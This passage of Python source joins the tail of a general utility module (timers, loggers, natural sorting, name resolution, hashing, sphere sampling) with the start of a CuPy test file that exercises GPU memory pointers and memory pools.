env["LANGUAGE"] = "C"
env["LANG"] = "C"
env["LC_ALL"] = "C"
from subprocess import Popen, PIPE, STDOUT
p = Popen(["git", "rev-parse", "HEAD"], shell=False,
stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True,
cwd=tree_root, env=env)
(git_rev, _) = p.communicate()
git_rev = git_rev.decode()
git_rev = git_rev.rstrip()
retcode = p.returncode
assert retcode is not None
if retcode != 0:
from warnings import warn
warn("unable to find git revision")
return None
return git_rev
def find_module_git_revision(module_file, n_levels_up):
from os.path import dirname, join
tree_root = join(*([dirname(module_file)] + [".." * n_levels_up]))
return find_git_revision(tree_root)
# }}}
# {{{ create a reshaped view of a numpy array
def reshaped_view(a, newshape):
""" Create a new view object with shape ``newshape`` without copying the data of
``a``. This function is different from ``numpy.reshape`` by raising an
exception when data copy is necessary.
:arg a: a :class:`numpy.ndarray` object.
:arg newshape: an ``int`` object or a tuple of ``int`` objects.
.. versionadded:: 2018.4
"""
newview = a.view()
newview.shape = newshape
return newview
# }}}
# {{{ process timer
SUPPORTS_PROCESS_TIME = True
class ProcessTimer:
"""Measures elapsed wall time and process time.
.. automethod:: __enter__
.. automethod:: __exit__
.. automethod:: done
Timing data attributes:
.. attribute:: wall_elapsed
.. attribute:: process_elapsed
.. versionadded:: 2018.5
"""
def __init__(self):
import time
self.perf_counter_start = time.perf_counter()
self.process_time_start = time.process_time()
self.wall_elapsed = None
self.process_elapsed = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def done(self):
import time
self.wall_elapsed = time.perf_counter() - self.perf_counter_start
self.process_elapsed = time.process_time() - self.process_time_start
def __str__(self):
cpu = self.process_elapsed / self.wall_elapsed
return f"{self.wall_elapsed:.2f}s wall {cpu:.2f}x CPU"
def __repr__(self):
wall = self.wall_elapsed
process = self.process_elapsed
return (f"{type(self).__name__}"
f"(wall_elapsed={wall!r}s, process_elapsed={process!r}s)")
# }}}
# {{{ log utilities
class ProcessLogger: # pylint: disable=too-many-instance-attributes
"""Logs the completion time of a (presumably) lengthy process to :mod:`logging`.
Only uses a high log level if the process took perceptible time.
.. automethod:: __init__
.. automethod:: done
.. automethod:: __enter__
.. automethod:: __exit__
"""
default_noisy_level = logging.INFO
def __init__( # pylint: disable=too-many-arguments
self, logger, description,
silent_level=None, noisy_level=None, long_threshold_seconds=None):
self.logger = logger
self.description = description
self.silent_level = silent_level or logging.DEBUG
self.noisy_level = noisy_level or self.default_noisy_level
self.long_threshold_seconds = (
# 0 is a valid value that should override the default
0.3 if long_threshold_seconds is None else long_threshold_seconds)
self.logger.log(self.silent_level, "%s: start", self.description)
self.is_done = False
import threading
self.late_start_log_thread = threading.Thread(target=self._log_start_if_long)
# Do not delay interpreter exit if thread not finished.
self.late_start_log_thread.daemon = True
# https://github.com/firedrakeproject/firedrake/issues/1422
# Starting a thread may irrecoverably break various environments,
# e.g. MPI.
#
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, do not do it unless there is (weak)
# evidence of interactive use.
import sys
if sys.stdin is None:
# Can happen, e.g., if pudb is controlling the console.
use_late_start_logging = False
else:
if hasattr(sys.stdin, "closed") and not sys.stdin.closed:
# can query stdin.isatty() only if stdin's open
use_late_start_logging = sys.stdin.isatty()
else:
use_late_start_logging = False
import os
if os.environ.get("PYTOOLS_LOG_NO_THREADS", ""):
use_late_start_logging = False
if use_late_start_logging:
try:
self.late_start_log_thread.start()
except RuntimeError:
# https://github.com/firedrakeproject/firedrake/issues/1422
#
# Starting a thread may fail in various environments, e.g. MPI.
# Since the late-start logging is an optional 'quality-of-life'
# feature for interactive use, tolerate failures of it without
# warning.
pass
self.timer = ProcessTimer()
def _log_start_if_long(self):
from time import sleep
sleep_duration = 10*self.long_threshold_seconds
sleep(sleep_duration)
if not self.is_done:
self.logger.log(
self.noisy_level, "%s: started %.gs ago",
self.description,
sleep_duration)
def done( # pylint: disable=keyword-arg-before-vararg
self, extra_msg=None, *extra_fmt_args):
self.timer.done()
self.is_done = True
completion_level = (
self.noisy_level
if self.timer.wall_elapsed > self.long_threshold_seconds
else self.silent_level)
msg = "%s: completed (%s)"
fmt_args = [self.description, str(self.timer)]
if extra_msg:
msg = f"{msg}: {extra_msg}"
fmt_args.extend(extra_fmt_args)
self.logger.log(completion_level, msg, *fmt_args)
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
class DebugProcessLogger(ProcessLogger):
default_noisy_level = logging.DEBUG
class log_process: # noqa: N801
"""A decorator that uses :class:`ProcessLogger` to log data about calls
to the wrapped function.
.. automethod:: __init__
.. automethod:: __call__
"""
def __init__(self, logger, description=None, long_threshold_seconds=None):
self.logger = logger
self.description = description
self.long_threshold_seconds = long_threshold_seconds
def __call__(self, wrapped):
def wrapper(*args, **kwargs):
with ProcessLogger(
self.logger,
self.description or wrapped.__name__,
long_threshold_seconds=self.long_threshold_seconds):
return wrapped(*args, **kwargs)
from functools import update_wrapper
new_wrapper = update_wrapper(wrapper, wrapped)
return new_wrapper
# }}}
# {{{ sorting in natural order
def natorder(item):
"""Return a key for natural order string comparison.
See :func:`natsorted`.
.. versionadded:: 2020.1
"""
import re
result = []
for (int_val, string_val) in re.findall(r"(\d+)|(\D+)", item):
if int_val:
result.append(int(int_val))
# Tie-breaker in case of leading zeros in *int_val*. Longer values
# compare smaller to preserve order of numbers in decimal notation,
# e.g., "1.001" < "1.01"
# (cf. https://github.com/sourcefrog/natsort)
result.append(-len(int_val))
else:
result.append(string_val)
return result
def natsorted(iterable, key=None, reverse=False):
"""Sort using natural order [1]_, as opposed to lexicographic order.
Example::
>>> sorted(["_10", "_1", "_9"]) == ["_1", "_10", "_9"]
True
>>> natsorted(["_10", "_1", "_9"]) == ["_1", "_9", "_10"]
True
:arg iterable: an iterable to be sorted. It must only have strings, unless
*key* is specified.
:arg key: if provided, a key function that returns strings for ordering
using natural order.
:arg reverse: if *True*, sorts in descending order.
:returns: a sorted list
.. [1] https://en.wikipedia.org/wiki/Natural_sort_order
.. versionadded:: 2020.1
"""
if key is None:
key = lambda x: x
return sorted(iterable, key=lambda y: natorder(key(y)), reverse=reverse)
# }}}
# {{{ resolve_name
# https://github.com/python/cpython/commit/1ed61617a4a6632905ad6a0b440cd2cafb8b6414
_DOTTED_WORDS = r"[a-z_]\w*(\.[a-z_]\w*)*"
_NAME_PATTERN = re.compile(f"^({_DOTTED_WORDS})(:({_DOTTED_WORDS})?)?$", re.I)
del _DOTTED_WORDS
def resolve_name(name):
"""A backport of :func:`pkgutil.resolve_name` (added in Python 3.9).
.. versionadded:: 2021.1.2
"""
# Delete the tail of the function and deprecate this once we require Python 3.9.
if sys.version_info >= (3, 9):
# use the official version
import pkgutil
return pkgutil.resolve_name(name) # pylint: disable=no-member
import importlib
m = _NAME_PATTERN.match(name)
if not m:
raise ValueError(f"invalid format: {name!r}")
groups = m.groups()
if groups[2]:
# there is a colon - a one-step import is all that's needed
mod = importlib.import_module(groups[0])
parts = groups[3].split(".") if groups[3] else []
else:
# no colon - have to iterate to find the package boundary
parts = name.split(".")
modname = parts.pop(0)
# first part *must* be a module/package.
mod = importlib.import_module(modname)
while parts:
p = parts[0]
s = f"{modname}.{p}"
try:
mod = importlib.import_module(s)
parts.pop(0)
modname = s
except ImportError:
break
# if we reach this point, mod is the module, already imported, and
# parts is the list of parts in the object hierarchy to be traversed, or
# an empty list if just the module is wanted.
result = mod
for p in parts:
result = getattr(result, p)
return result
# }}}
# {{{ unordered_hash
def unordered_hash(hash_instance, iterable, hash_constructor=None):
"""Using a hash algorithm given by the parameter-less constructor
*hash_constructor*, return a hash object whose internal state
depends on the entries of *iterable*, but not their order. If *hash*
is the instance returned by evaluating ``hash_constructor()``, then
the each entry *i* of the iterable must permit ``hash.upate(i)`` to
succeed. An example of *hash_constructor* is ``hashlib.sha256``
from :mod:`hashlib`. ``hash.digest_size`` must also be defined.
If *hash_constructor* is not provided, ``hash_instance.name`` is
used to deduce it.
:returns: the updated *hash_instance*.
.. warning::
The construction used in this function is likely not cryptographically
secure. Do not use this function in a security-relevant context.
.. versionadded:: 2021.2
"""
if hash_constructor is None:
from functools import partial
import hashlib
hash_constructor = partial(hashlib.new, hash_instance.name)
h_int = 0
for i in iterable:
h_i = hash_constructor()
h_i.update(i)
# Using sys.byteorder (for efficiency) here technically makes the
# hash system-dependent (which it should not be), however the
# effect of this is undone by the to_bytes conversion below, while
# left invariant by the intervening XOR operations (which do not
# mix adjacent bits).
h_int = h_int ^ int.from_bytes(h_i.digest(), sys.byteorder)
hash_instance.update(h_int.to_bytes(hash_instance.digest_size, sys.byteorder))
return hash_instance
# }}}
# {{{ sphere_sample
def sphere_sample_equidistant(npoints_approx: int, r: float = 1.0):
"""Generate points regularly distributed on a sphere
based on https://www.cmu.edu/biolphys/deserno/pdf/sphere_equi.pdf.
:returns: an :class:`~numpy.ndarray` of shape ``(3, npoints)``, where
``npoints`` does not generally equal *npoints_approx*.
"""
import numpy as np
points: List[np.ndarray] = []
count = 0
a = 4 * np.pi / npoints_approx
d = a ** 0.5
M_theta = int(np.ceil(np.pi / d)) # noqa: N806
d_theta = np.pi / M_theta
d_phi = a / d_theta
for m in range(M_theta):
theta = np.pi * (m + 0.5) / M_theta
M_phi = int(np.ceil(2 * np.pi * np.sin(theta) / d_phi)) # noqa: N806
for n in range(M_phi):
phi = 2 * np.pi * n / M_phi
points.append(np.array([
r * np.sin(theta) * np.cos(phi),
r * np.sin(theta) * np.sin(phi),
r * np.cos(theta)
]))
count += 1
# add poles
for i in range(3):
for sign in [-1, +1]:
pole = np.zeros(3)
pole[i] = r * sign
points.append(pole)
return np.array(points).T.copy()
# NOTE: each tuple contains ``(epsilon, max_npoints)``
_SPHERE_FIBONACCI_OFFSET = (
(0.33, 24), (1.33, 177), (3.33, 890),
(10, 11000), (27, 39000), (75, 600000), (214, float("inf")),
)
def sphere_sample_fibonacci(
npoints: int, r: float = 1.0, *,
optimize: Optional[str] = None):
"""Generate points on a sphere based on an offset Fibonacci lattice from [2]_.
.. [2] http://extremelearning.com.au/how-to-evenly-distribute-points-on-a-sphere-more-effectively-than-the-canonical-fibonacci-lattice/
:param optimize: takes the values: *None* to use the standard Fibonacci
lattice, ``"minimum"`` to minimize the nearest neighbor distances in the
lattice and ``"average"`` to minimize the average distances in the
lattice.
:returns: an :class:`~numpy.ndarray` of shape ``(3, npoints)``.
""" # noqa: E501
import numpy as np
if optimize is None:
epsilon = 0.5
elif optimize == "minimum":
epsilon, _ = next(o for o in _SPHERE_FIBONACCI_OFFSET if npoints < o[1])
elif optimize == "average":
epsilon = 0.36
else:
raise ValueError(f"unknown 'optimize' choice: '{optimize}'")
golden_ratio = (1 + np.sqrt(5)) / 2
n = np.arange(npoints)
phi = 2.0 * np.pi * n / golden_ratio
theta = np.arccos(1.0 - 2.0 * (n + epsilon) / (npoints + 2 * epsilon - 1))
return np.stack([
r * np.sin(theta) * np.cos(phi),
r * np.sin(theta) * np.sin(phi),
r * np.cos(theta)
])
# }}}
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
# vim: foldmethod=marker
|
test_memory.py
|
import ctypes
import gc
import pickle
import threading
import unittest
import fastrlock
import pytest
import cupy.cuda
from cupy.cuda import device
from cupy.cuda import memory
from cupy.cuda import stream as stream_module
from cupy import testing
class MockMemory(memory.Memory):
cur_ptr = 1
def __init__(self, size):
self.ptr = MockMemory.cur_ptr
MockMemory.cur_ptr += size
self.size = size
self.device_id = 0
def __del__(self):
self.ptr = 0
pass
def mock_alloc(size):
mem = MockMemory(size)
return memory.MemoryPointer(mem, 0)
class TestUnownedMemoryClass(unittest.TestCase):
def test_inherits_base_memory(self):
assert issubclass(memory.UnownedMemory, memory.BaseMemory)
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed, memory.malloc_async],
'specify_device_id': [True, False],
}))
@testing.gpu
class TestUnownedMemory(unittest.TestCase):
def check(self, device_id):
if cupy.cuda.runtime.is_hip:
if self.allocator is memory.malloc_managed:
raise unittest.SkipTest('HIP does not support managed memory')
if self.allocator is memory.malloc_async:
raise unittest.SkipTest('HIP does not support async mempool')
elif cupy.cuda.driver.get_build_version() < 11020:
raise unittest.SkipTest('malloc_async is supported since '
'CUDA 11.2')
size = 24
shape = (2, 3)
dtype = cupy.float32
with device.Device(device_id):
src_mem_ptr = self.allocator(size)
src_ptr = src_mem_ptr.ptr
args = (src_ptr, size, src_mem_ptr)
kwargs = {}
if self.specify_device_id:
kwargs = {'device_id': device_id}
unowned_mem = memory.UnownedMemory(*args, **kwargs)
assert unowned_mem.size == size
assert unowned_mem.ptr == src_ptr
assert unowned_mem.device_id == device_id
arr = cupy.ndarray(shape, dtype, memory.MemoryPointer(unowned_mem, 0))
# Delete the source object
del src_mem_ptr
with device.Device(device_id):
arr[:] = 2
assert (arr == 2).all()
def test_device0(self):
self.check(0)
@testing.multi_gpu(2)
def test_device1(self):
self.check(1)
@testing.gpu
class TestMemoryPointer(unittest.TestCase):
def test_int(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(1)
assert pval == int(memptr)
def test_add(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8)
memptr2 = memptr + 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval + 4 == int(memptr2)
memptr3 = 4 + memptr
assert isinstance(memptr3, memory.MemoryPointer)
assert pval + 4 == int(memptr3)
memptr += 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval + 4 == int(memptr)
def test_sub(self):
pval = MockMemory.cur_ptr
memptr = mock_alloc(8) + 4
memptr2 = memptr - 4
assert isinstance(memptr2, memory.MemoryPointer)
assert pval == int(memptr2)
memptr -= 4
assert isinstance(memptr, memory.MemoryPointer)
assert pval == int(memptr)
def test_copy_to_and_from_host(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from(ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p), 4)
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_copy_from_device_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from(a_cpu_ptr.value, 4)
b_gpu = memory.alloc(4)
b_gpu.copy_from(a_gpu, 4)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host(b_cpu_ptr.value, 4)
assert b_cpu.value == a_cpu.value
def test_memset(self):
a_gpu = memory.alloc(4)
a_gpu.memset(1, 4)
a_cpu = ctypes.c_ubyte()
for i in range(4):
a_gpu.copy_to_host(
ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p), 1)
assert a_cpu.value == 1
a_gpu += 1
@testing.parameterize(*testing.product({
'use_streams': [True, False],
}))
@testing.gpu
class TestMemoryPointerAsync(unittest.TestCase):
def setUp(self):
self.stream = stream_module.Stream() if self.use_streams else None
def test_copy_to_and_from_host_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_cpu = ctypes.c_int()
a_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_gpu.copy_from_async(ctypes.cast(ctypes.byref(
a_cpu), ctypes.c_void_p), 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_gpu.copy_to_host_async(
ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p),
4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_to_and_from_host_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
a_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
def test_copy_from_device_async_using_raw_ptr(self):
a_gpu = memory.alloc(4)
a_cpu = ctypes.c_int(100)
a_cpu_ptr = ctypes.cast(ctypes.byref(a_cpu), ctypes.c_void_p)
a_gpu.copy_from_async(a_cpu_ptr.value, 4, stream=self.stream)
b_gpu = memory.alloc(4)
b_gpu.copy_from_async(a_gpu, 4, stream=self.stream)
b_cpu = ctypes.c_int()
b_cpu_ptr = ctypes.cast(ctypes.byref(b_cpu), ctypes.c_void_p)
b_gpu.copy_to_host_async(b_cpu_ptr.value, 4, stream=self.stream)
if self.stream is not None:
self.stream.synchronize()
else:
stream_module.get_current_stream().synchronize()
assert b_cpu.value == a_cpu.value
# -----------------------------------------------------------------------------
# Memory pool
@testing.gpu
class TestSingleDeviceMemoryPool(unittest.TestCase):
def setUp(self):
self.pool = memory.SingleDeviceMemoryPool(allocator=mock_alloc)
self.unit = memory._allocation_unit_size
self.stream = stream_module.Stream()
self.stream_ident = self.stream.ptr
def test_round_size(self):
assert memory._round_size(self.unit - 1) == self.unit
assert memory._round_size(self.unit) == self.unit
assert memory._round_size(self.unit + 1) == self.unit * 2
def test_bin_index_from_size(self):
assert memory._bin_index_from_size(self.unit - 1) == 0
assert memory._bin_index_from_size(self.unit) == 0
assert memory._bin_index_from_size(self.unit + 1) == 1
def test_split(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
tail = chunk.split(self.unit * 2)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit * 2
assert chunk.prev is None
assert chunk.next.ptr() == tail.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail.ptr() == mem.ptr + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit * 2
assert tail.prev.ptr() == chunk.ptr()
assert tail.next is None
assert tail.stream_ident == self.stream_ident
tail_of_head = chunk.split(self.unit)
assert chunk.ptr() == mem.ptr
assert chunk.offset == 0
assert chunk.size == self.unit
assert chunk.prev is None
assert chunk.next.ptr() == tail_of_head.ptr()
assert chunk.stream_ident == self.stream_ident
assert tail_of_head.ptr() == mem.ptr + self.unit
assert tail_of_head.offset == self.unit
assert tail_of_head.size == self.unit
assert tail_of_head.prev.ptr() == chunk.ptr()
assert tail_of_head.next.ptr() == tail.ptr()
assert tail_of_head.stream_ident == self.stream_ident
tail_of_tail = tail.split(self.unit)
assert tail.ptr() == chunk.ptr() + self.unit * 2
assert tail.offset == self.unit * 2
assert tail.size == self.unit
assert tail.prev.ptr() == tail_of_head.ptr()
assert tail.next.ptr() == tail_of_tail.ptr()
assert tail.stream_ident == self.stream_ident
assert tail_of_tail.ptr() == mem.ptr + self.unit * 3
assert tail_of_tail.offset == self.unit * 3
assert tail_of_tail.size == self.unit
assert tail_of_tail.prev.ptr() == tail.ptr()
assert tail_of_tail.next is None
assert tail_of_tail.stream_ident == self.stream_ident
def test_merge(self):
mem = MockMemory(self.unit * 4)
chunk = memory._Chunk(mem, 0, mem.size, self.stream_ident)
chunk_ptr = chunk.ptr()
chunk_offset = chunk.offset
chunk_size = chunk.size
tail = chunk.split(self.unit * 2)
head = chunk
head_ptr = head.ptr()
head_offset = head.offset
head_size = head.size
tail_ptr = tail.ptr()
tail_offset = tail.offset
tail_size = tail.size
tail_of_head = head.split(self.unit)
tail_of_tail = tail.split(self.unit)
head.merge(tail_of_head)
assert head.ptr() == head_ptr
assert head.offset == head_offset
assert head.size == head_size
assert head.prev is None
assert head.next.ptr() == tail_ptr
assert head.stream_ident == self.stream_ident
tail.merge(tail_of_tail)
assert tail.ptr() == tail_ptr
assert tail.offset == tail_offset
assert tail.size == tail_size
assert tail.prev.ptr() == head_ptr
assert tail.next is None
assert tail.stream_ident == self.stream_ident
head.merge(tail)
assert head.ptr() == chunk_ptr
assert head.offset == chunk_offset
assert head.size == chunk_size
assert head.prev is None
assert head.next is None
assert head.stream_ident == self.stream_ident
def test_alloc(self):
p1 = self.pool.malloc(self.unit * 4)
p2 = self.pool.malloc(self.unit * 4)
p3 = self.pool.malloc(self.unit * 8)
assert p1.ptr != p2.ptr
assert p1.ptr != p3.ptr
assert p2.ptr != p3.ptr
def test_alloc_split(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
assert ptr + self.unit * 2 == tail.ptr
def test_alloc_limit(self):
self.pool.set_limit(size=(self.unit * 6))
p1 = self.pool.malloc(self.unit * 5)
p2 = self.pool.malloc(self.unit * 1)
with self.assertRaises(memory.OutOfMemoryError):
self.pool.malloc(self.unit)
self.pool.set_limit(size=(self.unit * 7))
p3 = self.pool.malloc(self.unit)
del p1, p2, p3
def test_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 == p2.ptr
def test_free_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_free_merge(self):
p = self.pool.malloc(self.unit * 4)
ptr = p.ptr
del p
# merge head into tail
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del tail
del head
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
# merge tail into head
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
assert ptr == head.ptr
del head
del tail
p = self.pool.malloc(self.unit * 4)
assert ptr == p.ptr
del p
def test_free_different_size(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
p2 = self.pool.malloc(self.unit * 8)
assert ptr1 != p2.ptr
def test_free_all_blocks(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
self.pool.free_all_blocks()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
del p2
def test_free_all_blocks_split(self):
# do not free splitted blocks
p = self.pool.malloc(self.unit * 4)
del p
head = self.pool.malloc(self.unit * 2)
tail = self.pool.malloc(self.unit * 2)
tailptr = tail.ptr
del tail
self.pool.free_all_blocks()
p = self.pool.malloc(self.unit * 2)
assert tailptr == p.ptr
del head
def test_free_all_blocks_stream(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks(stream=stream_module.Stream.null)
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 == p4.ptr
def test_free_all_blocks_all_streams(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 4)
ptr2 = p2.ptr
del p2
self.pool.free_all_blocks()
p3 = self.pool.malloc(self.unit * 4)
assert ptr1 != p3.ptr
assert ptr2 != p3.ptr
with self.stream:
p4 = self.pool.malloc(self.unit * 4)
assert ptr1 != p4.ptr
assert ptr2 != p4.ptr
def test_free_all_free(self):
p1 = self.pool.malloc(self.unit * 4)
ptr1 = p1.ptr
del p1
with testing.assert_warns(DeprecationWarning):
self.pool.free_all_free()
p2 = self.pool.malloc(self.unit * 4)
assert ptr1 != p2.ptr
def test_used_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.used_bytes()
del p2
assert self.unit * 2 == self.pool.used_bytes()
del p1
assert self.unit * 0 == self.pool.used_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 1 == self.pool.used_bytes()
del p3
def test_used_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.used_bytes()
del p2
def test_free_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 0 == self.pool.free_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 0 == self.pool.free_bytes()
del p2
assert self.unit * 4 == self.pool.free_bytes()
del p1
assert self.unit * 6 == self.pool.free_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 5 == self.pool.free_bytes()
del p3
def test_free_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 4 == self.pool.free_bytes()
del p2
def test_total_bytes(self):
p1 = self.pool.malloc(self.unit * 2)
assert self.unit * 2 == self.pool.total_bytes()
p2 = self.pool.malloc(self.unit * 4)
assert self.unit * 6 == self.pool.total_bytes()
del p1
assert self.unit * 6 == self.pool.total_bytes()
del p2
assert self.unit * 6 == self.pool.total_bytes()
p3 = self.pool.malloc(self.unit * 1)
assert self.unit * 6 == self.pool.total_bytes()
assert (self.pool.used_bytes() + self.pool.free_bytes()
== self.pool.total_bytes())
del p3
self.pool.free_all_blocks()
assert 0 == self.pool.total_bytes()
def test_total_bytes_stream(self):
p1 = self.pool.malloc(self.unit * 4)
del p1
with self.stream:
p2 = self.pool.malloc(self.unit * 2)
assert self.unit * 6 == self.pool.total_bytes()
del p2
def test_get_limit(self):
# limit is disabled by default
assert 0 == self.pool.get_limit()
def test_set_limit_size(self):
self.pool.set_limit(size=1024)
assert 1024 == self.pool.get_limit()
self.pool.set_limit(size=2**33)
assert 2**33 == self.pool.get_limit()
self.pool.set_limit(size=0)
assert 0 == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(size=-1)
def test_set_limit_fraction(self):
_, total = cupy.cuda.runtime.memGetInfo()
self.pool.set_limit(fraction=0)
assert 0 == self.pool.get_limit()
self.pool.set_limit(fraction=0.5)
assert total * 0.5 == self.pool.get_limit()
self.pool.set_limit(fraction=1.0)
assert total == self.pool.get_limit()
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=-1)
with self.assertRaises(ValueError):
self.pool.set_limit(fraction=1.1)
class TestParseMempoolLimitEnvVar(unittest.TestCase):
def test_parse_limit_string(self):
parse_limit_string = memory._parse_limit_string
# size
param = parse_limit_string('0')
assert 0 == param['size']
assert None is param['fraction']
param = parse_limit_string('1073741824')
assert 1073741824 == param['size']
assert None is param['fraction']
# fraction
param = parse_limit_string('0%')
assert None is param['size']
assert 0.0 == param['fraction']
param = parse_limit_string('40%')
assert None is param['size']
assert 0.4 == param['fraction']
param = parse_limit_string('70.5%')
assert None is param['size']
assert 0.705 == param['fraction']
param = parse_limit_string('100%')
assert None is param['size']
assert 1.0 == param['fraction']
@testing.parameterize(*testing.product({
'allocator': [memory._malloc, memory.malloc_managed],
}))
@testing.gpu
class TestMemoryPool(unittest.TestCase):
def setUp(self):
if (cupy.cuda.runtime.is_hip
and self.allocator is memory.malloc_managed):
raise unittest.SkipTest('HIP does not support managed memory')
self.pool = memory.MemoryPool(self.allocator)
def tearDown(self):
self.pool.free_all_blocks()
def test_zero_size_alloc(self):
with cupy.cuda.Device():
mem = self.pool.malloc(0).mem
assert isinstance(mem, memory.Memory)
assert not isinstance(mem, memory.PooledMemory)
def test_double_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
mem.free()
mem.free()
def test_free_all_blocks(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
assert isinstance(mem, memory.BaseMemory)
assert isinstance(mem, memory.PooledMemory)
assert self.pool.n_free_blocks() == 0
mem.free()
assert self.pool.n_free_blocks() == 1
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_blocks_without_malloc(self):
with cupy.cuda.Device():
# call directly without malloc.
self.pool.free_all_blocks()
assert self.pool.n_free_blocks() == 0
def test_free_all_free(self):
with cupy.cuda.Device():
mem = self.pool.malloc(1).mem
